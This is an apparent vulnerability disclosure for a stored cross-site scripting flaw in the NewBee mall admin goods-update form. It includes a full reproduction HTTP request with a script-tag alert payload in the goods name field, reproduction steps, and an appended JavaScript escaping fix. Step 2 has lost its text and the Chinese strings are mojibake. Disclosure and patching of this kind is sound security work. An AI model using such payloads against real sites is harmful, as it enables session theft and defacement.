[Suggested description]
There is a cross-site scripting (XSS) vulnerability in the commodity information modification module in the main version of NewBee mall. The form submission module that modifies commodity information does not restrict or escape sensitive characters in its input, so malicious JS code is executed and triggers a JS pop-up.
[Vulnerability Type]
Cross-site scripting vulnerability
POST /admin/goods/update HTTP/1.1
Host: localhost:28089
Content-Length: 392
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json
Origin: http://localhost:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
Connection: close

{"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}
[Impact Code execution]
true
[Vulnerability proof]
1. Access http://localhost:28089/admin/goods, select the commodity information to be modified and open it for editing.
2. Enter in the input box and click Save to complete the form submission.
3. The pop-up window is triggered when the page is refreshed, which completes the reproduction of the vulnerability.
[Vendor of Product] https://github.com/newbee-ltd/newbee-mall
[Affected Product Code Base] v1.0.0
[Affected Component]
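A sketch of the missing "restrict or escape" step for the update body shown above, to be applied before the values are written into an HTML page. This is an added example, not NewBee mall's own code: the function names, the split of fields into plain text and integers, and the sample object are assumptions made here.

```javascript
// Added example: restrict or escape the fields of a goods update body.
// Field names come from the request on this page; treating them as plain
// text or as integers is an assumption of this sketch.
const TEXT_FIELDS = ["goodsName", "goodsIntro", "tag"];
const NUMERIC_FIELDS = ["goodsId", "goodsCategoryId", "originalPrice",
                        "sellingPrice", "stockNum", "goodsSellStatus"];

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                        '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Returns { clean, errors }. Text fields are entity-encoded, numeric fields
// must be non-negative integers, all other fields pass through unchanged
// (goodsDetailContent is rich text and needs an allowlist HTML sanitizer,
// which is outside this sketch).
function hardenGoodsUpdate(body) {
  const clean = { ...body };
  const errors = [];
  for (const f of TEXT_FIELDS) {
    if (f in body) clean[f] = escapeHtml(body[f]);
  }
  for (const f of NUMERIC_FIELDS) {
    if (f in body && !/^\d+$/.test(String(body[f]))) {
      errors.push(`${f} must be a non-negative integer`);
    }
  }
  return { clean, errors };
}

// Constructed sample modelled on the request body above (ASCII name used).
const sample = {
  goodsId: "10907",
  goodsName: 'phone<script>alert("xss")</script>',
  goodsIntro: "xxx",
  tag: "phone",
  sellingPrice: "1",
  stockNum: "0",
};

const result = hardenGoodsUpdate(sample);
console.log(result.clean.goodsName, result.errors);
```

With the name encoded this way, a browser displays the markup as text instead of parsing it as a script element.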